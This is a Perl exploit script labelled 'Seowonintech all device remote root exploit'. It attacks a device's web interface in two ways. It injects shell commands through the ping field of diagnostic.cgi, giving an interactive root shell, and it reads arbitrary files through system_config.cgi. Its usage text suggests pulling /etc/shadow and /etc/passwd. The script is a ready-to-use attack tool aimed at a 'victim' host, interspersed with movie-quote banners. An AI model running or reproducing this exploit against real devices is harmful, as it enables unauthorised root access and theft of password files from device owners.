#!/usr/bin/perl
use LWP::Simple qw/ $ua get/;
my $host = $ARGV [0] =~ /^http:\/\// ? $ARGV [0]: 'http://' . $ARGV [0];
if (not defined $ARGV [0])
{
usg();
exit ;
}
print "[+] Seowonintech all device remote root exploit\n" ;
$diagcheck = $host . "/cgi-bin/diagnostic.cgi" ;
$syscheck = $host . "/cgi-bin/system_config.cgi" ;
$res = $ua ->get( $diagcheck ) || die "[-] Error: $!\n" ;
print "[+] Checking before attack..\n" ;
if ( $res ->status_line != 200){
print "[+] diagnostic.cgi Status: " . $res ->status_line. "\n" ;
} else {
print "[o] Victim is ready for attack.\n" ;
print "[o] Status: " . $res ->status_line. "\n" ;
if ( defined $res =~ m{selected>4</option>}sx){
print "[+] Connected to $ARGV[0]\n" ;
print "[+] The fight for the future Begins\n" ;
print "[+] Exploiting via remote command execution..\n" ;
print "[+] Permission granted, old friend.\n" ;
&rce;
} else {
print "[!] Warning: possible vulnerability.\n" ;
exit ;
}
}
$res1 = $ua ->get( $syscheck ) || die "[-] Error: $!\n" ;
if ( $res1 ->status_line != 200){
print "[+] system_config.cgi Status: " . $res1 ->status_line. "\n" ;
exit ;
} else {
print "[+] Trying to attack via remote file disclosure release.\n" ;
if ( defined $syscheck =~ s/value=\'\/etc\/\'//gs){
print "[+] Victim is ready for attack.\n" ;
print "[+] Connected to $ARGV[0]\n" ;
print "[o] Follow the white cat.\n" ;
print "[+] Exploiting via remote file dislocure..\n" ;
print "[+] You feeling lucky, Neo?\n" ;
&rfd;
} else {
print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n" ;
exit ;
}
}
sub rfd{
while (1){
print "# cat " ;
chomp ( $file =<STDIN>);
if ( $file eq "" ){ print "Enter full path to file!\n" ; }
$bug = $host . "/cgi-bin/system_config.cgi?file_name=" . $file . "&btn_type=load&action=APPLY" ;
$data =get( $bug ) || die "[-] Error: $ARGV[0] $!\n" ;
$data =~ s/Null/File not found!/gs;
if ( defined $data =~ m{rows= "30" >(.*?)</textarea>}sx){
print $1 . "\n" ;
}
}
}
sub rce{
while (1){
print "# " ;
chomp ( $rce =<STDIN>);
$bug = $host . "/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;" . $rce . ";&ping_count=1&action=Apply&html_view=ping" ;
$rce =~ s/\|/\;/;
if ( $rce eq "" ){ print "enter Linux command\n" ;}
if ( $rce eq "clear" ){ system $^O eq 'MSWin32' ? 'cls' : 'clear' ;}
if ( $rce eq "exit" || $rce eq "quit" ){ print "There is no spoon...\n" ; exit ;}
$data =get( $bug ) || die "[-] Error: $!\n" ;
if ( defined $data =~ m{(\s.*) Content-type:}sx){
$result = substr $1 , index ( $1 , ' loss' ) or substr $1 , index ( $1 , ' ms' );
$result =~ s/ loss\n//;
$result =~ s/ ms\n//;
print $result ;
}
}
}
sub usg
{
print " [+] Seowonintech all device remote root exploit\n" ;
print " [!] by Todor Donev todor dot donev @ googlemail.com\n" ;
print " [?] usg: perl $0 <victim>\n" ;
print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n" ;
print " [1] exmp xpl RCE: # uname -a :)\n" ;
print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n" ;
}
|